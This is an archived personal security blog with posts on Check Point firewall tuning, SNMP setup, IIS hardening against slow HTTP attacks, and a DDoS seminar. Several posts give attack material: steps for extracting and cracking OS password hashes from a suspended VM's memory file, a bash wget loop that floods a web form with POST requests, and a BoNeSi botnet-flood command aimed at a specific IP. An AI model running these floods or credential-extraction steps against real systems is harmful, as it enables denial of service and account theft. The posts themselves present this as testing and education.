Tuesday, March 11, 2014

Penetration Testing Framework --- Smart Pentester ---



I'm pleased to announce the first public release of Smart Pentester which aims to be a framework for Penetration testers.   http://smartpentester.com

Smart Pentester Framework will provide you a User Interface for Penetration testing, Malware Analysis, Forensic Analysis, Cyber Intelligence, Advanced packet generation techniques and more...



Sunday, February 17, 2013

Examining a Suspended Virtual Machine

I would like to show the danger of suspended virtual machines, with the tool called volatility there are several options you may extract from a vmem file can be found from the link below
With in the example , we will find the local password for the related OS User
To use hashdump, pass the virtual address of the SYSTEM hive as -y and the virtual address of the SAM hive as -s, like this

Hashes can now be cracked using John the Ripper, rainbow tables, etc
In this example I have used cracker.offensive-security.com password appeared with in few minutes

Illegal post SYN packet

Symptoms : fw ctl zdebug shows drops like: _tcstate_update Reason: Illegal post SYN packet;

Any packet from the Client other than SYN or RST, is considered as a security issue, fw thinks that the Client tries to send packets before the Server has responded to the initial request SYN
In order to allow such unexpected packets, enable the related kernel parameter on the Security Gateway.

Check the mechanism with,
# fw ctl get int fw_allow_out_of_state_post_syn

# fw ctl set int fw_allow_out_of_state_post_syn 1        activate on the fly
# fw ctl set int fw_allow_out_of_state_post_syn 0        deactivate on the fly

If it helps to resolve the issue it's time to make it persistent after a reboot
Create the $FWDIR/boot/modules/fwkern.conf file, if it does't exist.This file is not present by default

[Expert@testfw]# cd $FWDIR/boot/modules/
[Expert@testfw]# pwd
/opt/CPsuite-R7X/fw1/boot/modules
[Expert@testfw]# vi fwkern.conf

fw_allow_out_of_state_post_syn=0x1

define it with its hex value

Wednesday, February 6, 2013

IIS Tunning Recommendations against Slow http Attacks

If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. If the server keeps too many resources busy, this creates a denial of service.
A single attacker can take down victim web server with minimal bandwidth.

Limit request attributes is through the RequestLimits element, specifically the maxAllowedContentLength, maxQueryString, and maxUrl attributes
http://www.iis.net/configreference/system.webserver/security/requestfiltering/requestlimits

Suggestion
maximum URL length: 2KB by specifying 2048.
maximum query string length : 1KB by specifying 1024.
Deny access to unlisted HTTP verbs by clearing the Allow unlisted verbs check box.

Set headerLimits to configure the type and size of header your web server will accept.
http://www.iis.net/configreference/system.webserver/security/requestfiltering/requestlimits/headerlimits

Suggestion
Content-type: 100 bytes

Tune the connectionTimeout, headerWaitTimeout, and minBytesPerSecond attributes of the limits and WebLimits elements to minimize the impact of slow
HTTP attacks.

Suggestion
connectionTimeout: 30sec
headerWaitTimeout: 30sec
minBytesPerSecond: 250

Limits
http://www.iis.net/configreference/system.applicationhost/sites/sitedefaults/limits

Web Limits
http://www.iis.net/configreference/system.applicationhost/weblimits

Saturday, January 12, 2013

Lets do Some HTTP Post Flood

This tool allows you to edit and replicate HTTP parameters after the request finally leaves your browser.
Its for educational purposes only.The aim of this tool is to show the wget usage.
Can be downloaded at
https://docs.google.com/file/d/0B0EDab8sQhCCYTRvTlhFUTZwOTA/edit

File Named: HTTP Flooder v1.0 Uses WGET.zip
It Uses wget.exe located at c:\ drive, Creates an HTML file of the HTTP response at the directory where it runs.

Example Usage: Before running it,sniff the traffic with a local proxy like webscarab and copy/paste the final request data to flood.




For Linux Users,
Example of a simple bash script, will do a 100 post request

#!/bin/bash
for i in {1..100};
do
wget --user-agent=Firefox/10 --referer=https://www.vulnwebtest.com --post-data="__VIEWSTATE=%2FwEPDwULLTExMjU2MzY2MjcPZBYCAgMPZBYSAgMPDxYCHgRUZXh0BQxVc2VyIE5hbWUgOiBkZAIFDw8WBB8ABQR0ZXN0HgdFbmFibGVkaGRkAgcAPDxYCHgdWaXNpYmxlaGRkAgkPDxYCHwJoZGQCDQ8PFgIfAmdkZAIPDw8WB9B8ABQR0ZXN0HwJnZGQCEQ8PAFgIfAmdkZAITDw8WAh8CZ2RkAhUPDxYCHwJnZGRk8Nl1HK2Uc%2B9sUZwQEPNDjmgqRms%3D&__EVENTVALIDATION=%2FwEWBAK41KgrAuzRsusGAuzR9tkMArursYYIKiocz95qxVisTmMDLVdMhHxNkYk%3D&Email=test&Button=Send+Password" --no-check-certificate --no-dns-cache http://www.vulnwebtest.com/test.aspx
done

Tuesday, December 11, 2012

How to Simulate a HTTP GET BotNet DDoS Attack

Today I would like to share a cool tool called Bonesi DDoS Botnet Simulator.

web page : http://code.google.com/p/bonesi/

BoNeSi is able to simulate a TCP based HTTP-GET flood on a victim.3way handshake is completed. Its a much more advanced testing technique than Syn Http Flood, hping can only send tcp packet flags.
Since non spoofed IP connections require correct routing setup, this tool can only be used in closed testbed setups.

It can establish several thousands of HTTP connections from different IP addresses defined at iplist.txt making this tool to simulate advanced bot networks.

How does TCP Spoofing work?
BoNeSi sniffs for TCP packets on the network interface and responds to all packets in order to establish TCP connections. For this feature, it is necessary, that all traffic from the target webserver is routed back to the host running BoNeSi
HTTP-Flooding attacks can not be simulated in the internet, because answers from the webserver must be routed back to the host running BoNeSi.

It can be used to test firewall systems, routing hardware, DDoS Mitigation Systems or webservers directly.



my test usage was,
# bonesi -i 50k-bots.txt -p tcp -r 0 -u http://cagdastestlab.com -b useragent.txt -d eth1 -v 213.153.205.182:80



Usage: bonesi [OPTION...] <dst_ip:port>
 Options:
  -i, --ips=FILENAME               filename with ip list
  -p, --protocol=PROTO             udp (default), icmp or tcp
  -r, --send_rate=NUM              packets per second, 0 = infinite (default)
  -s, --payload_size=SIZE          size of the paylod, (default: 32)
  -o, --stats_file=FILENAME        filename for the statistics, (default: 'stats')
  -c, --max_packets=NUM            maximum number of packets (requests at tcp/http), 0 = infinite (default)
      --integer                    IPs are integers in host byte order instead of in dotted notation
  -t, --max_bots=NUM               determine max_bots in the 24bit prefix randomly (1-256)
  -u, --url=URL                    the url (default: '/') (only for tcp/http)
  -l, --url_list=FILENAME          filename with url list (only for tcp/http)
  -b, --useragent_list=FILENAME    filename with useragent list (only for tcp/http)
  -d, --device=DEVICE              network listening device (only for tcp/http)
  -m, --mtu=NUM                    set MTU, (default 1500)
  -f, --frag=NUM                   set fragmentation mode (0=IP, 1=TCP, default: 0)
  -v, --verbose                    print additional debug messages
  -h, --help                       print this message and exit



Monday, November 26, 2012

Smart Uploader (GUI for cp_uploader.exe)

As you know CheckPoint released a new upload tool called Check Point Uploader utility ( sk84000 )
This tool enables you to upload the files securely to Check Point using your user center credentials.

I have developed a GUI for cp_uploader.exe
Enjoy it!





Click to download Smart Uploader


Wednesday, November 14, 2012

How to Enable SNMP on Checkpoint

# snmp service disable
# snmp service enable
# snmp user show
You should delete the community named public
# snmp user del public
# snmp user add noauthuser CommunityName

# snmp service stat
You should see
SNMP service enabled and listening on port 161.
enable snmp extensions
# cp_conf snmp get
Currently SNMP Extension is active
# cp_conf snmp activate
Check the ports, both 260 and 161 should be listening..

Lets do some SNMP Walk
Total RAM on System
# snmpwalk -v1 -c CommunityName firewallipaddress .1.3.6.1.4.1.2021.4.5.0
do a fw tab -t connections -s and count connections
# snmpwalk -v1 -c testcom 192.168.1.112 .1.3.6.1.4.1.2620.1.1.25.3.0

Snmp version should be 5.3.1.0-2
checkout with the command #rpm –qa | grep net-snmp
Some Checkpoint SNMP OIDS
CPU Usage .1.3.6.1.4.1.2620.1.6.7.2.4.0
CPU System .1.3.6.1.4.1.2620.1.6.7.2.2.0
CPU User .1.3.6.1.4.1.2620.1.6.7.2.1.0
Number of Connections .1.3.6.1.4.1.2620.1.1.25.3.0
Peak Number of Connections .1.3.6.1.4.1.2620.1.1.25.4.0
Memory Total .1.3.6.1.4.1.2620.1.6.7.4.3.0
Memory Used .1.3.6.1.4.1.2620.1.6.7.4.4.0
Memory Free 1.3.6.1.4.1.2620.1.6.7.1.5.0
Memory Buffered .1.3.6.1.4.1.2021.4.14.0
Memory cached .1.3.6.1.4.1.2021.4.15.0
Swap error .1.3.6.1.4.1.2021.4.100.0
CPU FAN Speed 1.3.6.1.4.1.2620.1.6.7.8.2.1.3.1.0
Chassis FAN Speed 1.3.6.1.4.1.2620.1.6.7.8.2.1.3.2.0
Core Voltage 1.3.6.1.4.1.2620.1.6.7.8.3.1.3.1.0
VCC+Voltage 1.3.6.1.4.1.2620.1.6.7.8.3.1.3.2.0
1.8 Voltage 1.3.6.1.4.1.2620.1.6.7.8.3.1.3.3.0
5V Power Supply In 1.3.6.1.4.1.2620.1.6.7.8.3.1.3.4.0
5V Standby Voltage 1.3.6.1.4.1.2620.1.6.7.8.3.1.3.5.0
Battery Voltage 1.3.6.1.4.1.2620.1.6.7.8.3.1.3.6.0
CPU temperature 1.3.6.1.4.1.2620.1.6.7.8.1.1.3.1.0
M/B Temperature 1.3.6.1.4.1.2620.1.6.7.8.1.1.3.2.0

DDoS Seminar in Ankara

Last friday Checkpoint and InfoNet have prepared a DDoS seminar in Ankara,
I had created a lab similar to http://www.youtube.com/watch?v=5rhw7zsiarQ&feature=plcp that I have posted earlier.

The lab had 2 phases, with DDoS protector and without it which the attacker directly faces to firewall, We have investigated and compared both behaviours..

After showing some attack vectors the main subject was to try to explain the reason of why we need a DDoS mitigation device other than getting this as a service from ISP and explained why its a network design problem and how to deal with it on every hop count